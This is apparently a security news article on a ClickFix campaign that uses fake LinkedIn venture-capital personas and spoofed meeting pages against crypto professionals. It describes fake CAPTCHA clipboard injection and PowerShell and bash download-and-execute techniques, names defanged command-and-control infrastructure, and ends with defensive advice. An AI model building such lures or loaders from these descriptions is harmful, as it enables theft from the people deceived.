ClickFix Campaign Exploits Fake Venture Capitalists on LinkedIn to Target Crypto and Web3 Professionals
A sophisticated cyberattack campaign has emerged, targeting professionals in the cryptocurrency and Web3 sectors through a combination of social engineering, fabricated venture capital identities, and deceptive video conferencing links. First identified in early 2026, this operation employs a technique known as ClickFix to manipulate victims into executing malicious commands on their own devices, effectively making them unwitting participants in their own compromise.
The Attack Sequence
The campaign initiates on LinkedIn, where attackers assume the persona of Mykhailo Hureiev, who presents himself as the Co-Founder and Managing Partner of a fictitious investment firm named SolidBit Capital. Engaging with targets by referencing their public work in cryptocurrency or decentralized finance (DeFi) communities, the attacker builds a facade of trust. The conversation then shifts towards scheduling a call, during which the victim is provided with a Calendly link that surreptitiously redirects them to a counterfeit Zoom meeting page designed to deploy malware.
Infrastructure and Fake Identities
Analysts from Moonlock have traced the infrastructure supporting this campaign to a single registrant: Anatolli Bigdasch, purportedly located in Boston, Massachusetts, using the email address anatollibigdasch0717[at]gmail[.]com. Beyond SolidBit Capital, researchers uncovered additional fictitious company fronts—MegaBit and Lumax Capital—each featuring polished websites, AI-generated team headshots, and fabricated company histories. Notably, the domain lumax[.]capital was registered on February 2, 2026, indicating that the threat actors are preparing to deploy new identities as existing ones become exposed.
Cross-Platform Payloads
This campaign is notable for delivering payloads compatible with both macOS and Windows operating systems. On January 9, 2026, a victim using the X handle @0xbigdan shared screenshots of the entire interaction, highlighting key red flags—such as Hureiev joining a legitimate Google Meet session, remaining completely silent, and abruptly disconnecting when the victim expressed skepticism.
Operational Patterns and Attribution
The operational patterns of this campaign closely mirror activities previously attributed to UNC1069, a threat actor with suspected connections to North Korea, tracked since 2018. However, definitive attribution in this instance remains open.
The ClickFix Delivery Mechanism
The ClickFix technique is central to this campaign’s success. When a victim clicks on the fraudulent Zoom or Google Meet link, they are directed to a page that closely resembles legitimate platforms—such as The Digital Asset Conference III or a typosquatted version of Hedgeweek, a genuine hedge fund publication. Overlaid on this page is a counterfeit Cloudflare I’m not a robot verification box, constructed entirely from local HTML and CSS, with no actual connection to Cloudflare’s infrastructure.
Upon clicking the checkbox, JavaScript silently writes a malicious command to the user’s clipboard via `navigator.clipboard.writeText()`. The script detects the browser’s User-Agent string to identify the operating system and serves the corresponding payload.
– For Windows Users: The clipboard receives a PowerShell command that conceals its window, bypasses execution policies, and utilizes Invoke-Expression to run a remote script in memory—leaving no trace on disk for antivirus software to detect.
– For macOS Users: A bash one-liner installs Homebrew if Python 3 is absent, downloads a Python script from the command-and-control server at hedgeweeks[.]online, and executes it with `nohup bash` to keep the process running even after the terminal is closed.
Implications and Recommendations
This campaign underscores the evolving sophistication of social engineering attacks targeting the cryptocurrency and Web3 sectors. By leveraging professional networking platforms like LinkedIn and exploiting the trust associated with venture capital firms, attackers can effectively deceive even the most vigilant individuals.
To mitigate the risk of such attacks, professionals in these industries should:
1. Verify Identities: Conduct thorough due diligence when approached by individuals claiming to represent investment firms. Cross-reference their information with official company websites and reputable sources.
2. Scrutinize Communication Channels: Be cautious of unsolicited meeting invitations and verify the authenticity of scheduling links.
3. Exercise Caution with Clipboard Activity: Be wary of prompts to copy and paste commands into your terminal or command prompt, especially from unverified sources.
4. Implement Security Measures: Utilize endpoint protection solutions capable of detecting and preventing the execution of unauthorized scripts and commands.
5. Stay Informed: Keep abreast of emerging threats and tactics employed by cybercriminals targeting the cryptocurrency and Web3 sectors.
By adopting these practices, professionals can enhance their resilience against sophisticated social engineering attacks and protect their assets and information from malicious actors.
